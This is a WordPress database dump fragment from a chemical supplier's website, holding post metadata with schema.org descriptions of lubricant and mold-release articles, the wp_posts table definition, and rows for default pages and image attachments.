INSERT INTO `wp_postmeta` VALUES (45195, 290, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45196, 1058, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45197, 986, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45198, 1221, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45199, 1081, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45200, 818, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45201, 882, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45202, 734, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45203, 733, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45204, 1292, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45205, 3358, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45206, 1117, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:55:"https://www.miller-stephenson.com/krytox-lube-for-life/";}s:3:"url";s:55:"https://www.miller-stephenson.com/krytox-lube-for-life/";s:8:"headline";s:20:"Krytox Lube For Life";s:13:"datePublished";s:25:"2016-08-31T15:44:58+00:00";s:12:"dateModified";s:25:"2016-10-12T20:10:24+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-grease-electric-motor.jpg";s:5:"width";i:2600;s:6:"height";i:1733;}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:8:"keywords";s:42:"2E45, AUT, For, Grease, Krytox, Life, Lube";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:310:"Krytox™ Lube For Life A North American company improves equipment reliability by switching lubricants and joining the Lube for Life program. A major pulp and paper mill located in Western Canada wanted to improve the average operating life of its 3000 electric motors operating in a harsh environment without";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45207, 648, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45208, 648, '_schema_json_timestamp', '1503401634'); 
INSERT INTO `wp_postmeta` VALUES (45209, 937, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45210, 3322, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45211, 3322, '_schema_json_timestamp', '1503402238'); 
INSERT INTO `wp_postmeta` VALUES (45212, 1708, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45213, 4288, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45214, 822, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45215, 3610, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:61:"https://www.miller-stephenson.com/medical-guidewire-coatings/";}s:3:"url";s:61:"https://www.miller-stephenson.com/medical-guidewire-coatings/";s:8:"headline";s:62:"Medical Guidewire Coatings: Innovative Fluoropolymer Solutions";s:13:"datePublished";s:25:"2017-02-16T19:01:54+00:00";s:12:"dateModified";s:25:"2017-05-17T18:53:25+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_300125900.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:25:"Miller-Stephenson Medical";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:397:"Medical Guidewire Coatings: Miller-Stephenson\'s fluoropolymer coatings leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices. In the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:12:"Chris Pavlik";s:3:"url";s:59:"https://www.miller-stephenson.com/author/cpavlikmschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45216, 769, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45217, 1763, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45218, 607, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45219, 607, '_schema_json_timestamp', '1503407106'); 
INSERT INTO `wp_postmeta` VALUES (45220, 347, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45221, 637, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45222, 999, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45223, 1035, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45224, 891, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45225, 622, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45226, 1458, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45227, 1458, '_schema_json_timestamp', '1503409663'); 
INSERT INTO `wp_postmeta` VALUES (45228, 647, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45233, 654, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45234, 3190, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:93:"https://www.miller-stephenson.com/miller-stephenson-2017-krytox-price-increase-press-release/";}s:3:"url";s:93:"https://www.miller-stephenson.com/miller-stephenson-2017-krytox-price-increase-press-release/";s:8:"headline";s:61:"Miller-Stephenson 2017 Krytox™ Price Increase Press Release";s:13:"datePublished";s:25:"2016-12-01T19:12:25+00:00";s:12:"dateModified";s:25:"2016-12-01T20:37:51+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/ms-letterhead.jpg";s:5:"width";s:4:"1012";s:6:"height";s:3:"292";}s:14:"articleSection";s:13:"Press Release";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:310:"December 1, 2016 SUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017 Chemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product. As you can";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45235, 827, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45236, 3323, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45237, 3323, '_schema_json_timestamp', '1503410975'); 
INSERT INTO `wp_postmeta` VALUES (45238, 3237, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:70:"https://www.miller-stephenson.com/krytox-electrical-conducting-grease/";}s:3:"url";s:70:"https://www.miller-stephenson.com/krytox-electrical-conducting-grease/";s:8:"headline";s:37:"Krytox - Electrical Conducting Grease";s:13:"datePublished";s:25:"2016-12-09T19:41:04+00:00";s:12:"dateModified";s:25:"2016-12-09T19:41:04+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/electrical-grease.jpg";s:5:"width";i:696;s:6:"height";s:3:"400";}s:14:"articleSection";s:28:"Krytox™ Lubricant Articles";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:338:"Krytox™ perfluoropolyether (PFPE) oils with no additives are good insulators. The typical dielectric properties are shown in the table. There is no difference in the electrical properties of different grades of oils, as their chemical properties are identical, and the primary difference is viscosity. The properties vary slightly, with";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45239, 1710, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45240, 3187, '_schema_json', 'a:12:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:75:"https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/";}s:3:"url";s:75:"https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/";s:8:"headline";s:45:"2017 Krytox™ Price Increase - Chemours News";s:13:"datePublished";s:25:"2016-12-01T19:04:52+00:00";s:12:"dateModified";s:25:"2016-12-01T20:23:31+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png";s:5:"width";i:696;s:6:"height";s:3:"124";}s:14:"articleSection";s:13:"Press Release";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:350:"November 16, 2016 Dear Valued Customer: Re: Krytox™ Lubricants and Fluoroguard™ Polymer Additives Effective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products. Chemours will increase price by an average of 4% across its standard product";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:16:"Zayyan Chowdhury";s:3:"url";s:48:"https://www.miller-stephenson.com/author/zayyan/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45241, 1209, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45242, 652, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45243, 989, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45244, 989, '_schema_json_timestamp', '1503417110'); 
INSERT INTO `wp_postmeta` VALUES (45245, 368, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45246, 368, '_schema_json_timestamp', '1503413713'); 
INSERT INTO `wp_postmeta` VALUES (45247, 2886, '_schema_json', 'a:13:{s:8:"@context";s:18:"http://schema.org/";s:5:"@type";s:11:"BlogPosting";s:16:"mainEntityOfPage";a:2:{s:5:"@type";s:7:"WebPage";s:3:"@id";s:54:"https://www.miller-stephenson.com/rubber-mold-release/";}s:3:"url";s:54:"https://www.miller-stephenson.com/rubber-mold-release/";s:8:"headline";s:51:"Rubber & Silicone Mold Release Agents | ReleaSys™";s:13:"datePublished";s:25:"2016-11-04T19:22:39+00:00";s:12:"dateModified";s:25:"2016-12-22T16:52:41+00:00";s:5:"image";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_259045955.jpg";s:5:"width";i:1000;s:6:"height";i:667;}s:14:"articleSection";s:26:"Miller-Stephenson Articles";s:8:"keywords";s:19:"Mold Release Agents";s:9:"publisher";a:3:{s:5:"@type";s:12:"Organization";s:4:"name";s:34:"Miller-Stephenson Chemical Company";s:4:"logo";a:4:{s:5:"@type";s:11:"ImageObject";s:3:"url";s:0:"";s:5:"width";i:600;s:6:"height";i:60;}}s:11:"description";s:356:"[share title=""] Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents Sporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the";s:6:"author";a:3:{s:5:"@type";s:6:"Person";s:4:"name";s:12:"Chris Pavlik";s:3:"url";s:59:"https://www.miller-stephenson.com/author/cpavlikmschem-com/";}}'); 
INSERT INTO `wp_postmeta` VALUES (45248, 302, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45249, 910, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45250, 1002, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45251, 1227, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45252, 1742, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45253, 1742, '_schema_json_timestamp', '1503416169'); 
INSERT INTO `wp_postmeta` VALUES (45254, 1102, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45255, 717, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45256, 1806, '_schema_json', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (45257, 1806, '_schema_json_timestamp', '1503416755');
#
# End of data contents of table `wp_postmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_posts`


#
# Delete any existing table `wp_posts`
#

DROP TABLE IF EXISTS `wp_posts`;


#
# Table structure of table `wp_posts`
#

CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=4877 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_posts`
#
 
INSERT INTO `wp_posts` VALUES (2, 1, '2016-08-15 18:57:32', '2016-08-15 18:57:32', 'This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href="https://www.miller-stephenson.com/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun!', 'Sample Page', '', 'publish', 'closed', 'open', '', 'sample-page', '', '', '2016-08-15 18:57:32', '2016-08-15 18:57:32', '', 0, 'https://132.148.10.86/wordpress/?page_id=2', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (4, 1, '2016-08-15 19:07:46', '0000-00-00 00:00:00', 'This is a preview of how this form will appear on your website', 'ninja_forms_preview_page', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-08-15 19:07:46', '0000-00-00 00:00:00', '', 0, 'https://132.148.10.86/wordpress/?page_id=4', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (5, 1, '2016-08-15 19:12:29', '2016-08-15 19:12:29', '[yith_wcwl_wishlist]', 'Wishlist', '', 'publish', 'closed', 'closed', '', 'wishlist', '', '', '2016-08-15 19:12:29', '2016-08-15 19:12:29', '', 0, 'https://132.148.10.86/wordpress/wishlist/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (6, 1, '2016-08-15 19:13:49', '2016-08-15 19:13:49', '', 'Conformal', '', 'inherit', 'open', 'closed', '', 'conformal', '', '', '2016-08-15 19:13:49', '2016-08-15 19:13:49', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Conformal.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (7, 1, '2016-08-15 19:14:22', '2016-08-15 19:14:22', '', 'Conformal_Epoxy', '', 'inherit', 'open', 'closed', '', 'conformal_epoxy', '', '', '2016-08-15 19:14:22', '2016-08-15 19:14:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Conformal_Epoxy.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (8, 1, '2016-08-15 19:15:01', '2016-08-15 19:15:01', '', 'CV joints', '', 'inherit', 'open', 'closed', '', 'cv-joints', '', '', '2016-08-15 19:15:01', '2016-08-15 19:15:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/CV-joints.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (9, 1, '2016-08-15 19:15:14', '2016-08-15 19:15:14', '', 'gasket', '', 'inherit', 'open', 'closed', '', 'gasket', '', '', '2016-08-15 19:15:14', '2016-08-15 19:15:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/gasket.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (10, 1, '2016-08-15 19:15:21', '2016-08-15 19:15:21', '', 'MEdical', '', 'inherit', 'open', 'closed', '', 'medical', '', '', '2016-08-15 19:15:21', '2016-08-15 19:15:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MEdical-.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (11, 1, '2016-08-15 19:15:25', '2016-08-15 19:15:25', '', 'Sp.Solvents', '', 'inherit', 'open', 'closed', '', 'sp-solvents', '', '', '2016-08-15 19:15:25', '2016-08-15 19:15:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Sp.Solvents.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (12, 1, '2016-08-15 19:15:28', '2016-08-15 19:15:28', '', 'Support', '', 'inherit', 'open', 'closed', '', 'support', '', '', '2016-08-15 19:15:28', '2016-08-15 19:15:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Support.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (13, 1, '2016-08-15 19:15:34', '2016-08-15 19:15:34', '', 'VAZO (2)', '', 'inherit', 'open', 'closed', '', 'vazo-2', '', '', '2016-08-15 19:15:34', '2016-08-15 19:15:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-2-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (14, 1, '2016-08-15 19:16:07', '2016-08-15 19:16:07', '', 'VAZO', '', 'inherit', 'open', 'closed', '', 'vazo', '', '', '2016-08-15 19:16:07', '2016-08-15 19:16:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (15, 1, '2016-08-15 19:16:24', '2016-08-15 19:16:24', '', 'Aerospace Mold Release', 'ReleaSys semi-permanent', 'inherit', 'open', 'closed', '', 'aerospace', '', '', '2016-08-18 18:42:52', '2016-08-18 18:42:52', '', 455, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Aerospace.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (16, 1, '2016-08-15 19:16:34', '2016-08-15 19:16:34', '', 'PTFE release agent - MS-122AV', '', 'inherit', 'open', 'closed', '', 'automotive', '', '', '2016-11-21 18:42:45', '2016-11-21 18:42:45', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Automotive.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (17, 1, '2016-08-15 19:16:58', '2016-08-15 19:16:58', '', 'Bearings  (1)', '', 'inherit', 'open', 'closed', '', 'bearings-1', '', '', '2016-08-15 19:16:58', '2016-08-15 19:16:58', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Bearings-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (18, 1, '2016-08-15 19:17:43', '2016-08-15 19:17:43', '', 'Miller Stephenson Logo', 'Since 1955 - Providing Chemicals for Industry', 'inherit', 'open', 'closed', '', 'logo', '', '', '2016-08-15 19:18:55', '2016-08-15 19:18:55', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/logo-3.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (19, 1, '2016-08-15 19:19:44', '2016-08-15 19:19:44', '', 'Shop', '', 'publish', 'closed', 'closed', '', 'shop', '', '', '2016-08-15 19:19:44', '2016-08-15 19:19:44', '', 0, 'https://132.148.10.86/wordpress/shop/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (20, 1, '2016-08-15 19:19:44', '2016-08-15 19:19:44', '[woocommerce_cart]', 'Cart', '', 'publish', 'closed', 'closed', '', 'cart', '', '', '2016-08-15 19:19:44', '2016-08-15 19:19:44', '', 0, 'https://132.148.10.86/wordpress/cart/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (21, 1, '2016-08-15 19:19:44', '2016-08-15 19:19:44', '[woocommerce_checkout]', 'Checkout', '', 'publish', 'closed', 'closed', '', 'checkout', '', '', '2016-08-15 19:19:44', '2016-08-15 19:19:44', '', 0, 'https://132.148.10.86/wordpress/checkout/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (22, 1, '2016-08-15 19:19:44', '2016-08-15 19:19:44', '[woocommerce_my_account]', 'My Account', '', 'publish', 'closed', 'closed', '', 'my-account', '', '', '2016-08-15 19:19:44', '2016-08-15 19:19:44', '', 0, 'https://132.148.10.86/wordpress/my-account/', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (24, 1, '2016-08-15 19:21:57', '2016-08-15 19:21:57', '', 'logo_ms', '', 'inherit', 'open', 'closed', '', 'logo_ms', '', '', '2016-08-15 19:21:57', '2016-08-15 19:21:57', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/logo_ms.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (25, 1, '2016-08-15 19:23:59', '2016-08-15 19:23:59', '', 'teflon logo', '', 'inherit', 'open', 'closed', '', 'teflon-logo', '', '', '2016-08-15 19:23:59', '2016-08-15 19:23:59', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/teflon-logo.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (26, 1, '2016-08-15 19:29:15', '2016-08-15 19:29:15', '', 'bulb', '', 'inherit', 'open', 'closed', '', 'bulb', '', '', '2016-08-15 19:29:15', '2016-08-15 19:29:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/bulb.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (27, 1, '2016-08-15 19:29:16', '2016-08-15 19:29:16', '', 'catalog', '', 'inherit', 'open', 'closed', '', 'catalog', '', '', '2016-08-15 19:29:16', '2016-08-15 19:29:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/catalog.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (28, 1, '2016-08-15 19:29:17', '2016-08-15 19:29:17', '', 'chemours1', '', 'inherit', 'open', 'closed', '', 'chemours1', '', '', '2016-08-15 19:29:17', '2016-08-15 19:29:17', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/chemours1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (29, 1, '2016-08-15 19:29:18', '2016-08-15 19:29:18', '', 'cleaning', '', 'inherit', 'open', 'closed', '', 'cleaning', '', '', '2016-08-15 19:29:18', '2016-08-15 19:29:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/cleaning.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (30, 1, '2016-08-15 19:29:19', '2016-08-15 19:29:19', '', 'cleanroom', '', 'inherit', 'open', 'closed', '', 'cleanroom', '', '', '2016-08-15 19:29:19', '2016-08-15 19:29:19', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/cleanroom.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (31, 1, '2016-08-15 19:29:19', '2016-08-15 19:29:19', '', 'coatings', '', 'inherit', 'open', 'closed', '', 'coatings', '', '', '2016-08-15 19:29:19', '2016-08-15 19:29:19', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/coatings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (32, 1, '2016-08-15 19:29:20', '2016-08-15 19:29:20', '', 'compounding_oil', '', 'inherit', 'open', 'closed', '', 'compounding_oil', '', '', '2016-08-15 19:29:20', '2016-08-15 19:29:20', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/compounding_oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (33, 1, '2016-08-15 19:29:21', '2016-08-15 19:29:21', '', 'compressedgas', '', 'inherit', 'open', 'closed', '', 'compressedgas', '', '', '2016-08-15 19:29:21', '2016-08-15 19:29:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/compressedgas.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (34, 1, '2016-08-15 19:29:22', '2016-08-15 19:29:22', '', 'concentrate', '', 'inherit', 'open', 'closed', '', 'concentrate', '', '', '2016-08-15 19:29:22', '2016-08-15 19:29:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/concentrate.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (35, 1, '2016-08-15 19:29:22', '2016-08-15 19:29:22', '', 'confidential', '', 'inherit', 'open', 'closed', '', 'confidential', '', '', '2016-08-15 19:29:22', '2016-08-15 19:29:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/confidential.jpg', 0, 'attachment', 'image/jpeg', 0); 
